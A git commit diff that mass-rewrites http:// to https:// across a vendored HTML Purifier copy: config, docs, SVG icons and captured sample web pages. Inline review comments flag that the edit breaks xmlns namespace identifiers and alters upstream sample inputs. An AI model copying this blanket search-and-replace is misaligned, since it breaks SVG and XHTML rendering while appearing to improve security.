Server geändert

aschwarz
2023-04-25 13:12:50 +02:00
parent 5e9c9cf19d
commit 57b74ca3a5
647 changed files with 3051 additions and 3051 deletions


@@ -17,7 +17,7 @@
# This tag specifies the encoding used for all characters in the config file that
# follow. The default is UTF-8 which is also the encoding used for all text before
# the first occurrence of this tag. Doxygen uses libiconv (or the iconv built into
# libc) for the transcoding. See http://www.gnu.org/software/libiconv for the list of
# libc) for the transcoding. See https://www.gnu.org/software/libiconv for the list of
# possible encodings.
DOXYFILE_ENCODING = UTF-8
@@ -493,7 +493,7 @@ INPUT = ". "
# This tag can be used to specify the character encoding of the source files that
# doxygen parses. Internally doxygen uses the UTF-8 encoding, which is also the default
# input encoding. Doxygen uses libiconv (or the iconv built into libc) for the transcoding.
# See http://www.gnu.org/software/libiconv for the list of possible encodings.
# See https://www.gnu.org/software/libiconv for the list of possible encodings.
INPUT_ENCODING = UTF-8
@@ -646,7 +646,7 @@ REFERENCES_LINK_SOURCE = YES
# If the USE_HTAGS tag is set to YES then the references to source code
# will point to the HTML generated by the htags(1) tool instead of doxygen
# built-in source browser. The htags tool is part of GNU's global source
# tagging system (see http://www.gnu.org/software/global/global.html). You
# tagging system (see https://www.gnu.org/software/global/global.html). You
# will need version 4.8.6 or higher.
USE_HTAGS = NO
@@ -1149,7 +1149,7 @@ PERL_PATH = /usr/bin/perl
CLASS_DIAGRAMS = YES
# You can define message sequence charts within doxygen comments using the \msc
# command. Doxygen will then run the mscgen tool (see http://www.mcternan.me.uk/mscgen/) to
# command. Doxygen will then run the mscgen tool (see https://www.mcternan.me.uk/mscgen/) to
# produce the chart and insert it in the documentation. The MSCGEN_PATH tag allows you to
# specify the directory where the mscgen tool resides. If left empty the tool is assumed to
# be found in the default search path.


@@ -59,7 +59,7 @@ codebase. If you don't know what doctype you are using, you can determine
the doctype from this identifier at the top of your source code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...and the character encoding from this code:
@@ -67,7 +67,7 @@ the doctype from this identifier at the top of your source code:
If the character encoding declaration is missing, STOP NOW, and
read 'docs/enduser-utf8.html' (web accessible at
http://htmlpurifier.org/docs/enduser-utf8.html). In fact, even if it is
https://htmlpurifier.org/docs/enduser-utf8.html). In fact, even if it is
present, read this document anyway, as many websites specify their
document's character encoding incorrectly.
@@ -234,7 +234,7 @@ However, switching to UTF-8 is not always immediately feasible, so we can
adapt.
HTML Purifier uses iconv to support other character encodings, as such,
any encoding that iconv supports <http://www.gnu.org/software/libiconv/>
any encoding that iconv supports <https://www.gnu.org/software/libiconv/>
HTML Purifier supports with this code:
$config->set('Core.Encoding', /* put your encoding here */);
@@ -271,10 +271,10 @@ Other supported doctypes include:
4.3. Other settings
There are more configuration directives which can be read about
here: <http://htmlpurifier.org/live/configdoc/plain.html> They're a bit boring,
here: <https://htmlpurifier.org/live/configdoc/plain.html> They're a bit boring,
but they can help out for those of you who like to exert maximum control over
your code. Some of the more interesting ones are configurable at the
demo <http://htmlpurifier.org/demo.php> and are well worth looking into
demo <https://htmlpurifier.org/demo.php> and are well worth looking into
for your own system.
For example, you can fine tune allowed elements and attributes, convert
@@ -288,7 +288,7 @@ translates to:
E.g.
$config->set('HTML.Allowed', 'p,b,a[href],i');
$config->set('URI.Base', 'http://www.example.com');
$config->set('URI.Base', 'https://www.example.com');
$config->set('URI.MakeAbsolute', true);
$config->set('AutoFormat.AutoParagraph', true);


@@ -213,7 +213,7 @@ real release we decided to skip this version number.
4.3.0, released 2011-03-27
# Fixed broken caching of customized raw definitions, but requires an
API change. The old API still works but will emit a warning,
see http://htmlpurifier.org/docs/enduser-customize.html#optimized
see https://htmlpurifier.org/docs/enduser-customize.html#optimized
for how to upgrade your code.
# Protect against Internet Explorer innerHTML behavior by specially
treating attributes with backticks but no angled brackets, quotes or
@@ -347,7 +347,7 @@ real release we decided to skip this version number.
- Fix bug where URIDefinition would not get cleared if it's directives got
changed.
- Fix fatal error in HTMLPurifier_Encoder on certain platforms (probably NetBSD 5.0)
- Fix bug in Linkify autoformatter involving <a><span>http://foo</span></a>
- Fix bug in Linkify autoformatter involving <a><span>https://foo</span></a>
- Make %URI.Munge not apply to links that have the same host as your host.
- Prevent stray </body> tag from truncating output, if a second </body>
is present.
@@ -681,7 +681,7 @@ real release we decided to skip this version number.
! DefinitionCacheFactory now can register new implementations
! New HTMLPurifier_Filter_ExtractStyleBlocks for extracting <style> from
documents and cleaning their contents up. Requires the CSSTidy library
<http://csstidy.sourceforge.net/>. You can access the blocks with the
<https://csstidy.sourceforge.net/>. You can access the blocks with the
'StyleBlocks' Context variable ($purifier->context->get('StyleBlocks')).
The output CSS can also be "scoped" for a specific element, use:
%Filter.ExtractStyleBlocksScope
@@ -1041,7 +1041,7 @@ real release we decided to skip this version number.
- Replaced version check with functionality check for DOM (thanks Stephen
Khoo)
. Added smoketest 'all.php', which loads all other smoketests via frames
. Implemented AttrDef_CSSURI for url(http://google.com) style declarations
. Implemented AttrDef_CSSURI for url(https://google.com) style declarations
. Added convenient single test selector form on test runner
1.3.2, released 2006-12-25
@@ -1103,7 +1103,7 @@ real release we decided to skip this version number.
+ %Attr.IDPrefixLocal - Same as above, but for when there are multiple
instances of user content on the page
+ Profuse documentation on how to use these available in docs/enduser-id.txt
! Added MODx plugin <http://modxcms.com/forums/index.php/topic,6604.0.html>
! Added MODx plugin <https://modxcms.com/forums/index.php/topic,6604.0.html>
! Added percent encoding normalization
! XSS attacks smoketest given facelift
! Configuration documentation now has table of contents


@@ -1,4 +1,4 @@
HTML Purifier [![Build Status](https://secure.travis-ci.org/ezyang/htmlpurifier.svg?branch=master)](http://travis-ci.org/ezyang/htmlpurifier)
HTML Purifier [![Build Status](https://secure.travis-ci.org/ezyang/htmlpurifier.svg?branch=master)](https://travis-ci.org/ezyang/htmlpurifier)
=============
HTML Purifier is an HTML filtering solution that uses a unique combination
@@ -18,7 +18,7 @@ Places to go:
an in-depth installation guide.
* See WYSIWYG for information on editors like TinyMCE and FCKeditor
HTML Purifier can be found on the web at: [http://htmlpurifier.org/](http://htmlpurifier.org/)
HTML Purifier can be found on the web at: [https://htmlpurifier.org/](https://htmlpurifier.org/)
## Installation


@@ -13,7 +13,7 @@ afraid to cast your vote for the next feature to be implemented!
Things to do as soon as possible:
- http://htmlpurifier.org/phorum/read.php?3,5560,6307#msg-6307
- https://htmlpurifier.org/phorum/read.php?3,5560,6307#msg-6307
- Think about allowing explicit order of operations hooks for transforms
- Fix "<.<" bug (trailing < is removed if not EOD)
- Build in better internal state dumps and debugging tools for remote
@@ -27,7 +27,7 @@ Things to do as soon as possible:
problem is what to do when a module "supersedes" another
(see also tables and basic tables.) This is a little dicier
because HTML.SafeObject has some extra functionality that
trusted might find useful. See http://htmlpurifier.org/phorum/read.php?3,5762,6100
trusted might find useful. See https://htmlpurifier.org/phorum/read.php?3,5762,6100
FUTURE VERSIONS
---------------
@@ -88,7 +88,7 @@ Ongoing
AutoFormat
- Smileys
- Syntax highlighting (with GeSHi) with <pre> and possibly <?php
- Look at http://drupal.org/project/Modules/category/63 for ideas
- Look at https://drupal.org/project/Modules/category/63 for ideas
Neat feature related
! Support exporting configuration, so users can easily tweak settings


@@ -1,13 +1,13 @@
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!-- Created with Inkscape (http://www.inkscape.org/) -->
<!-- Created with Inkscape (https://www.inkscape.org/) -->
<svg
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:cc="http://web.resource.org/cc/"
xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns:svg="http://www.w3.org/2000/svg"
xmlns="http://www.w3.org/2000/svg"
xmlns:sodipodi="http://inkscape.sourceforge.net/DTD/sodipodi-0.dtd"
xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape"
xmlns:dc="https://purl.org/dc/elements/1.1/"
xmlns:cc="https://web.resource.org/cc/"
xmlns:rdf="https://www.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns:svg="https://www.w3.org/2000/svg"
xmlns="https://www.w3.org/2000/svg"
xmlns:sodipodi="https://inkscape.sourceforge.net/DTD/sodipodi-0.dtd"
xmlns:inkscape="https://www.inkscape.org/namespaces/inkscape"
width="16.000000px"
height="16.000000px"
id="svg2"
@@ -80,7 +80,7 @@
rdf:about="">
<dc:format>image/svg+xml</dc:format>
<dc:type
rdf:resource="http://purl.org/dc/dcmitype/StillImage" />
rdf:resource="https://purl.org/dc/dcmitype/StillImage" />
</cc:Work>
</rdf:RDF>
</metadata>
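Review bot: The `xmlns` values rewritten in this section are namespace names, not links to fetch, and XML parsers compare them as exact strings, so `xmlns="https://www.w3.org/2000/svg"` no longer names the SVG namespace and a conforming renderer will not treat `<svg>` and its children as SVG. The same holds for the `dc`, `cc`, `rdf`, `sodipodi` and `inkscape` prefixes and the `rdf:resource` value here, for the two SVG sections that follow (which also change `xmlns:xlink`), and for `<html xmlns="https://www.w3.org/1999/xhtml" ...>` in the later XHTML page. These lines should keep their original values, e.g. `xmlns="http://www.w3.org/2000/svg"`; only the `Created with Inkscape` comment holds an actual hyperlink. A scheme rewrite across 647 files should skip `xmlns` attributes and DOCTYPE identifiers instead of matching every `http://`.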


@@ -1,13 +1,13 @@
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!-- Created with Inkscape (http://www.inkscape.org/) -->
<!-- Created with Inkscape (https://www.inkscape.org/) -->
<svg
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:cc="http://web.resource.org/cc/"
xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns:svg="http://www.w3.org/2000/svg"
xmlns="http://www.w3.org/2000/svg"
xmlns:sodipodi="http://inkscape.sourceforge.net/DTD/sodipodi-0.dtd"
xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape"
xmlns:dc="https://purl.org/dc/elements/1.1/"
xmlns:cc="https://web.resource.org/cc/"
xmlns:rdf="https://www.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns:svg="https://www.w3.org/2000/svg"
xmlns="https://www.w3.org/2000/svg"
xmlns:sodipodi="https://inkscape.sourceforge.net/DTD/sodipodi-0.dtd"
xmlns:inkscape="https://www.inkscape.org/namespaces/inkscape"
width="16.000000px"
height="16.000000px"
id="svg2"
@@ -80,7 +80,7 @@
rdf:about="">
<dc:format>image/svg+xml</dc:format>
<dc:type
rdf:resource="http://purl.org/dc/dcmitype/StillImage" />
rdf:resource="https://purl.org/dc/dcmitype/StillImage" />
</cc:Work>
</rdf:RDF>
</metadata>


@@ -1,14 +1,14 @@
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!-- Created with Inkscape (http://www.inkscape.org/) -->
<!-- Created with Inkscape (https://www.inkscape.org/) -->
<svg
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:cc="http://web.resource.org/cc/"
xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns:svg="http://www.w3.org/2000/svg"
xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink"
xmlns:sodipodi="http://inkscape.sourceforge.net/DTD/sodipodi-0.dtd"
xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape"
xmlns:dc="https://purl.org/dc/elements/1.1/"
xmlns:cc="https://web.resource.org/cc/"
xmlns:rdf="https://www.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns:svg="https://www.w3.org/2000/svg"
xmlns="https://www.w3.org/2000/svg"
xmlns:xlink="https://www.w3.org/1999/xlink"
xmlns:sodipodi="https://inkscape.sourceforge.net/DTD/sodipodi-0.dtd"
xmlns:inkscape="https://www.inkscape.org/namespaces/inkscape"
width="82.000000mm"
height="82.000000mm"
id="svg2"
@@ -98,7 +98,7 @@
rdf:about="">
<dc:format>image/svg+xml</dc:format>
<dc:type
rdf:resource="http://purl.org/dc/dcmitype/StillImage" />
rdf:resource="https://purl.org/dc/dcmitype/StillImage" />
</cc:Work>
</rdf:RDF>
</metadata>


@@ -1,4 +1,4 @@
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Main Page - Huaxia Taiji Club</title>
@@ -13,9 +13,9 @@
<div id="heading"><a href="/en/Main_Page" title="English Main Page">Huaxia Taiji Club</a>
<a class="heading_ch" href="/ch/Main_Page" title="&#20013;&#25991;&#20027;&#39029;">&#21326;&#22799;&#22826;&#26497;&#20465;&#20048;&#37096;</a></div>
<ul id="menu">
<li><a href="/en/Main_Page" class="active">Main Page</a></li><li><a href="/en/About">About</a></li><li><a href="/en/News">News</a></li><li><a href="/en/Events">Events</a></li><li><a href="/en/Digest">Digest</a></li><li><a href="/en/Taiji_and_I">Taiji and I</a></li><li><a href="/en/Downloads">Downloads</a></li><li><a href="/en/Registration">Registration</a></li><li><a href="/en/Contact">Contact</a></li> <li><a href="http://www.taijiclub.org/gallery2/main.php">Gallery</a></li>
<li><a href="/en/Main_Page" class="active">Main Page</a></li><li><a href="/en/About">About</a></li><li><a href="/en/News">News</a></li><li><a href="/en/Events">Events</a></li><li><a href="/en/Digest">Digest</a></li><li><a href="/en/Taiji_and_I">Taiji and I</a></li><li><a href="/en/Downloads">Downloads</a></li><li><a href="/en/Registration">Registration</a></li><li><a href="/en/Contact">Contact</a></li> <li><a href="https://www.taijiclub.org/gallery2/main.php">Gallery</a></li>
<li><a href="http://www.taijiclub.org/forums/index.php">Forums</a></li>
<li><a href="https://www.taijiclub.org/forums/index.php">Forums</a></li>
</ul>
<div id="content">
@@ -26,10 +26,10 @@
<ul>
<li>Zou Xiaojun was elected as the new club vice president </li>
<li>HX Edison Taiji Club <a href="http://www.taijiclub.org/downloads/Taiji_club_regulation_.pdf">by-law</a> effective 3/28/2006</li>
<li>HX Edison Taiji Club <a href="https://www.taijiclub.org/downloads/Taiji_club_regulation_.pdf">by-law</a> effective 3/28/2006</li>
<li>A new email account for our club: HXEdisontaijiclub@yahoo.com</li>
<li>Workshop conducted by <a href="http://www.taijiclub.org/ch/Digest/LiDeyin">?????</a> Li Deyin is set on June 4, 2006 at Clarion Hotel in Edison from 9:30am-12pm; <a href="http://www.taijiclub.org/en/Registration">Registration</a></li>
<li>Workshop conducted by <a href="https://www.taijiclub.org/ch/Digest/LiDeyin">?????</a> Li Deyin is set on June 4, 2006 at Clarion Hotel in Edison from 9:30am-12pm; <a href="https://www.taijiclub.org/en/Registration">Registration</a></li>
</ul>
</div>
@@ -46,7 +46,7 @@
<p>Check out our <a href="/gallery2/main.php">gallery</a>.</p>
<div style="text-align:center;"><a href="http://www.taijiclub.org/gallery2/v/2006/group1b.jpg.html?g2_imageViewsIndex=1"><img src="/gallery2/d/1836-2/group1b.jpg" /></a></div>
<div style="text-align:center;"><a href="https://www.taijiclub.org/gallery2/v/2006/group1b.jpg.html?g2_imageViewsIndex=1"><img src="/gallery2/d/1836-2/group1b.jpg" /></a></div>
<div style="text-align:center;">Click on photo to see HR version</div></div>
</body>
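Review bot: Every absolute link in this page was switched to `https://` (for example `<a href="https://www.taijiclub.org/forums/index.php">`) with nothing in the commit indicating that the hosts were checked for HTTPS support. The file looks like a captured third-party page kept as sample input, which is an inference from its content because the path is not shown. If so, it is never served to users, and the rewrite adds no transport security while changing the bytes the sample exercises. If it belongs to a vendored library copy, it should stay byte-identical to the upstream release so the copy can be diffed or checksummed against upstream on update; excluding the vendored directory from the search-and-replace keeps that check meaningful. The Google, Angelfire and Wikipedia sample pages later in this commit are affected the same way, including URLs nested inside redirector paths and query strings such as `continue=https://www.google.com/`.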


@@ -10,11 +10,11 @@ function sf(){document.f.q.focus();}
function rwt(el,ct,cd,sg){var e = window.encodeURIComponent ? encodeURIComponent : escape;el.href="/url?sa=t&ct="+e(ct)+"&cd="+e(cd)+"&url="+e(el.href).replace(/\+/g,"%2B")+"&ei=fHNBRJDEG4HSaLONmIoP"+sg;el.onmousedown="";return true;}
// -->
</script>
</head><body bgcolor=#ffffff text=#000000 link=#0000cc vlink=#551a8b alink=#ff0000 onLoad=sf() topmargin=3 marginheight=3><center><table border=0 cellspacing=0 cellpadding=0 width=100%><tr><td align=right nowrap><font size=-1><b>edwardzyang@gmail.com</b>&nbsp;|&nbsp;<a href="/url?sa=p&pref=ig&pval=2&q=http://www.google.com/ig%3Fhl%3Den" onmousedown="return rwt(this,'pro','hppphou:def','&sig2=hDbTpsWIp9YG37a23n6krQ')">Personalized Home</a>&nbsp;|&nbsp;<a href="/searchhistory/?hl=en">Search History</a>&nbsp;|&nbsp;<a href="https://www.google.com/accounts/ManageAccount">My Account</a>&nbsp;|&nbsp;<a href="http://www.google.com/accounts/Logout?continue=http://www.google.com/">Sign out</a></font></td></tr><tr height=4><td><img alt="" width=1 height=1></td></tr></table><img src="/intl/en/images/logo.gif" width=276 height=110 alt="Google"><br><br>
</head><body bgcolor=#ffffff text=#000000 link=#0000cc vlink=#551a8b alink=#ff0000 onLoad=sf() topmargin=3 marginheight=3><center><table border=0 cellspacing=0 cellpadding=0 width=100%><tr><td align=right nowrap><font size=-1><b>edwardzyang@gmail.com</b>&nbsp;|&nbsp;<a href="/url?sa=p&pref=ig&pval=2&q=https://www.google.com/ig%3Fhl%3Den" onmousedown="return rwt(this,'pro','hppphou:def','&sig2=hDbTpsWIp9YG37a23n6krQ')">Personalized Home</a>&nbsp;|&nbsp;<a href="/searchhistory/?hl=en">Search History</a>&nbsp;|&nbsp;<a href="https://www.google.com/accounts/ManageAccount">My Account</a>&nbsp;|&nbsp;<a href="https://www.google.com/accounts/Logout?continue=https://www.google.com/">Sign out</a></font></td></tr><tr height=4><td><img alt="" width=1 height=1></td></tr></table><img src="/intl/en/images/logo.gif" width=276 height=110 alt="Google"><br><br>
<form action=/search name=f><script><!--
function qs(el) {if (window.RegExp && window.encodeURIComponent) {var ue=el.href;var qe=encodeURIComponent(document.f.q.value);if(ue.indexOf("q=")!=-1){el.href=ue.replace(new RegExp("q=[^&$]*"),"q="+qe);}else{el.href=ue+"&q="+qe;}}return 1;}
// -->
</script><table border=0 cellspacing=0 cellpadding=4><tr><td nowrap><font size=-1><b>Web</b>&nbsp;&nbsp;&nbsp;&nbsp;<a id=1a class=q href="/imghp?hl=en&tab=wi" onClick="return qs(this);">Images</a>&nbsp;&nbsp;&nbsp;&nbsp;<a id=2a class=q href="http://groups.google.com/grphp?hl=en&tab=wg" onClick="return qs(this);">Groups</a>&nbsp;&nbsp;&nbsp;&nbsp;<a id=4a class=q href="http://news.google.com/nwshp?hl=en&tab=wn" onClick="return qs(this);">News</a>&nbsp;&nbsp;&nbsp;&nbsp;<a id=5a class=q href="http://froogle.google.com/frghp?hl=en&tab=wf" onClick="return qs(this);">Froogle</a>&nbsp;&nbsp;&nbsp;&nbsp;<a id=8a class=q href="/lochp?hl=en&tab=wl" onClick="return qs(this);">Local</a>&nbsp;&nbsp;&nbsp;&nbsp;<b><a href="/intl/en/options/" class=q>more&nbsp;&raquo;</a></b></font></td></tr></table><table cellspacing=0 cellpadding=0><tr><td width=25%>&nbsp;</td><td align=center><input type=hidden name=hl value=en><input maxlength=2048 size=55 name=q value="" title="Google Search"><br><input type=submit value="Google Search" name=btnG><input type=submit value="I'm Feeling Lucky" name=btnI></td><td valign=top nowrap width=25%><font size=-2>&nbsp;&nbsp;<a href=/advanced_search?hl=en>Advanced Search</a><br>&nbsp;&nbsp;<a href=/preferences?hl=en>Preferences</a><br>&nbsp;&nbsp;<a href=/language_tools?hl=en>Language Tools</a></font></td></tr></table></form><br><br><font size=-1><a href="/ads/">Advertising&nbsp;Programs</a> - <a href=/services/>Business Solutions</a> - <a href=/about.html>About Google</a></font><p><font size=-2>&copy;2006 Google</font></p></center></body></html>
</script><table border=0 cellspacing=0 cellpadding=4><tr><td nowrap><font size=-1><b>Web</b>&nbsp;&nbsp;&nbsp;&nbsp;<a id=1a class=q href="/imghp?hl=en&tab=wi" onClick="return qs(this);">Images</a>&nbsp;&nbsp;&nbsp;&nbsp;<a id=2a class=q href="https://groups.google.com/grphp?hl=en&tab=wg" onClick="return qs(this);">Groups</a>&nbsp;&nbsp;&nbsp;&nbsp;<a id=4a class=q href="https://news.google.com/nwshp?hl=en&tab=wn" onClick="return qs(this);">News</a>&nbsp;&nbsp;&nbsp;&nbsp;<a id=5a class=q href="https://froogle.google.com/frghp?hl=en&tab=wf" onClick="return qs(this);">Froogle</a>&nbsp;&nbsp;&nbsp;&nbsp;<a id=8a class=q href="/lochp?hl=en&tab=wl" onClick="return qs(this);">Local</a>&nbsp;&nbsp;&nbsp;&nbsp;<b><a href="/intl/en/options/" class=q>more&nbsp;&raquo;</a></b></font></td></tr></table><table cellspacing=0 cellpadding=0><tr><td width=25%>&nbsp;</td><td align=center><input type=hidden name=hl value=en><input maxlength=2048 size=55 name=q value="" title="Google Search"><br><input type=submit value="Google Search" name=btnG><input type=submit value="I'm Feeling Lucky" name=btnI></td><td valign=top nowrap width=25%><font size=-2>&nbsp;&nbsp;<a href=/advanced_search?hl=en>Advanced Search</a><br>&nbsp;&nbsp;<a href=/preferences?hl=en>Preferences</a><br>&nbsp;&nbsp;<a href=/language_tools?hl=en>Language Tools</a></font></td></tr></table></form><br><br><font size=-1><a href="/ads/">Advertising&nbsp;Programs</a> - <a href=/services/>Business Solutions</a> - <a href=/about.html>About Google</a></font><p><font size=-2>&copy;2006 Google</font></p></center></body></html>
<!-- vim: et sw=4 sts=4
-->


@@ -7,7 +7,7 @@
<div id="tb">
<form name="lycos_search" method="get" target="_new" style="margin: 0px"
action="http://r.hotbot.com/r/memberpgs_lycos_searchbox_af/http://www.angelfire.lycos.com/cgi-bin/search/pursuit">
action="https://r.hotbot.com/r/memberpgs_lycos_searchbox_af/https://www.angelfire.lycos.com/cgi-bin/search/pursuit">
<table id="tbtable" cellpadding="0" cellspacing="0" border="0" width="100%" style="border: 1px solid black;">
<tr style="background-color: #dcf7ff">
@@ -20,34 +20,34 @@
<td nowrap="nowrap">The Web</td>
<td><input type="radio" name="cat" value="angelfire"></td>
<td nowrap="nowrap">Angelfire</td>
<td nowrap="nowrap">&nbsp;&nbsp;&nbsp;<img src="http://af.lygo.com/d/toolbar/planeticon.gif"></td><td nowrap="nowrap">&nbsp;<a href="http://r.lycos.com/r/tlbr_planet/http://planet.lycos.com" target="_new">Planet</a></td>
<td nowrap="nowrap">&nbsp;&nbsp;&nbsp;<img src="https://af.lygo.com/d/toolbar/planeticon.gif"></td><td nowrap="nowrap">&nbsp;<a href="https://r.lycos.com/r/tlbr_planet/https://planet.lycos.com" target="_new">Planet</a></td>
</tr>
</table>
<td nowrap="nowrap"><a href="http://lt.angelfire.com/af_toolbar/edit/_h_/www.angelfire.lycos.com/build/index.tmpl" target="_top">
<td nowrap="nowrap"><a href="https://lt.angelfire.com/af_toolbar/edit/_h_/www.angelfire.lycos.com/build/index.tmpl" target="_top">
<span id="build">Edit your Site</span></a>&nbsp;</td>
<td><img src="http://af.lygo.com/d/toolbar/dir.gif" alt="show site directory" border="0" height="10" hspace="3" width="8"></td>
<td nowrap="nowrap"><a href="http://lt.angelfire.com/af_toolbar/browse/_h_/www.angelfire.lycos.com/directory/index.tmpl" target="_top">Browse Sites</a>&nbsp;</td>
<td><a href="http://lt.angelfire.com/af_toolbar/angelfire/_h_/www.angelfire.lycos.com" target="_top"><img src="http://af.lygo.com/d/toolbar/aflogo_top.gif" alt="hosted by angelfire" border="0" height="26" width="143"></a></td>
<td><img src="https://af.lygo.com/d/toolbar/dir.gif" alt="show site directory" border="0" height="10" hspace="3" width="8"></td>
<td nowrap="nowrap"><a href="https://lt.angelfire.com/af_toolbar/browse/_h_/www.angelfire.lycos.com/directory/index.tmpl" target="_top">Browse Sites</a>&nbsp;</td>
<td><a href="https://lt.angelfire.com/af_toolbar/angelfire/_h_/www.angelfire.lycos.com" target="_top"><img src="https://af.lygo.com/d/toolbar/aflogo_top.gif" alt="hosted by angelfire" border="0" height="26" width="143"></a></td>
</tr>
<tr style="background-color: #dcf7ff">
<td nowrap="nowrap" valign="middle">&nbsp;<input size="30" style="font-size: 10px; background-color: #fff;" type="text" name="query" id="searchbox"></td>
<td style="background: #fff url(http://af.lygo.com/d/toolbar/bg.gif) repeat-x; text-align: center;" colspan="3" align="center">
<a href="http://clk.atdmt.com/VON/go/lycsnvon0710000019von/direct/01/"><img src="/sys/free_logo_xxxx_157x20.gif" height="20" width="157" border="0" alt="Vonage"></a><img src="http://view.atdmt.com/VON/view/lycsnvon0710000019von/direct/01/"></td>
<td style="background: #fff url(https://af.lygo.com/d/toolbar/bg.gif) repeat-x; text-align: center;" colspan="3" align="center">
<a href="https://clk.atdmt.com/VON/go/lycsnvon0710000019von/direct/01/"><img src="/sys/free_logo_xxxx_157x20.gif" height="20" width="157" border="0" alt="Vonage"></a><img src="https://view.atdmt.com/VON/view/lycsnvon0710000019von/direct/01/"></td>
<span style="font-size: 11px;">
<span style="color:#00f; font-weight:bold;">&#171;</span>
<span id="top100">
<a href="javascript:void top100('prev')" target="_top">Previous</a> |
<a href="http://lt.angelfire.com/af_toolbar/top100/_h_/www.angelfire.lycos.com/cgi-bin/top100/pagelist?start=1" target="_top">Top 100</a> |
<a href="https://lt.angelfire.com/af_toolbar/top100/_h_/www.angelfire.lycos.com/cgi-bin/top100/pagelist?start=1" target="_top">Top 100</a> |
<a href="javascript:void top100('next')" target="_top">Next</a>
</span>
<span style="color: #00f; font-weight: bold;">&#187;</span>
</span>
</td>
<td valign="top" style="background: #fff url(http://af.lygo.com/d/toolbar/bg.gif) repeat-x;"><a href="http://lt.angelfire.com/af_toolbar/angelfire/_h_/www.angelfire.lycos.com" target="_top"><img src="http://af.lygo.com/d/toolbar/aflogo_bot.gif" alt="hosted by angelfire" border="0" height="22" width="143"></a></td>
<td valign="top" style="background: #fff url(https://af.lygo.com/d/toolbar/bg.gif) repeat-x;"><a href="https://lt.angelfire.com/af_toolbar/angelfire/_h_/www.angelfire.lycos.com" target="_top"><img src="https://af.lygo.com/d/toolbar/aflogo_bot.gif" alt="hosted by angelfire" border="0" height="22" width="143"></a></td>
</tr>
</table>
</form>
@@ -60,7 +60,7 @@ if (objAdMgr.isSlotAvailable("leaderboard")) {
}
</script>
<noscript>
<a href="http://network.realmedia.com/RealMedia/ads/click_nx.ads/lycosangelfire/ros/728x90/wp/ss/a/491169@Top1?x"><img border="0" src="http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/lycosangelfire/ros/728x90/wp/ss/a/491169@Top1" alt="leaderboard ad" /></a>
<a href="https://network.realmedia.com/RealMedia/ads/click_nx.ads/lycosangelfire/ros/728x90/wp/ss/a/491169@Top1?x"><img border="0" src="https://network.realmedia.com/RealMedia/ads/adstream_nx.ads/lycosangelfire/ros/728x90/wp/ss/a/491169@Top1" alt="leaderboard ad" /></a>
</noscript>
</td></tr>
@@ -112,10 +112,10 @@ if (objAdMgr.isSlotAvailable("leaderboard")) {
<tr><td><font face="verdana,geneva" color="#000011" size="1">What is better, subtitled or dubbed anime?</font></td></tr>
<tr><td><input type="radio" name="rd" value="1"><font face="verdana" size="2" color="#000011">Subtitled</font></td></tr>
<tr><td align="middle"><font face="verdana" size="1"><a href="http://pub.alxnet.com/poll?id=2079873&q=view">Current results</a></font></td></tr>
<tr><td align="middle"><font face="verdana" size="1"><a href="https://pub.alxnet.com/poll?id=2079873&q=view">Current results</a></font></td></tr>
</table></td></tr>
<tr>
<td><font face="verdana" size="1"><a href="http://www.alxnet.com/services/poll/">Free
<td><font face="verdana" size="1"><a href="https://www.alxnet.com/services/poll/">Free
Web Polls</a></font></td>
</tr>
</table></form>


@@ -1,10 +1,10 @@
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="keywords" content="Tai Chi Chuan,Yang Pan-hou,Yang Chien-hou,Yang style Tai Chi Chuan,Yang Lu-ch'an,Wu/Hao style T'ai Chi Ch'uan,Wu Ch'uan-y<>,Hao Wei-chen,Yang Shou-chung,Wu style T'ai Chi Ch'uan,Wu Chien-ch'<27>an" />
<link rel="shortcut icon" href="/favicon.ico" />
<link rel="copyright" href="http://www.gnu.org/copyleft/fdl.html" />
<link rel="copyright" href="https://www.gnu.org/copyleft/fdl.html" />
<title>Tai Chi Chuan - Wikipedia, the free encyclopedia</title>
<style type="text/css" media="screen,projection">/*<![CDATA[*/ @import "/skins-1.5/monobook/main.css?9"; /*]]>*/</style>
<link rel="stylesheet" type="text/css" media="print" href="/skins-1.5/common/commonPrint.css" />
@@ -34,7 +34,7 @@
<div id="content">
<a name="top" id="top"></a>
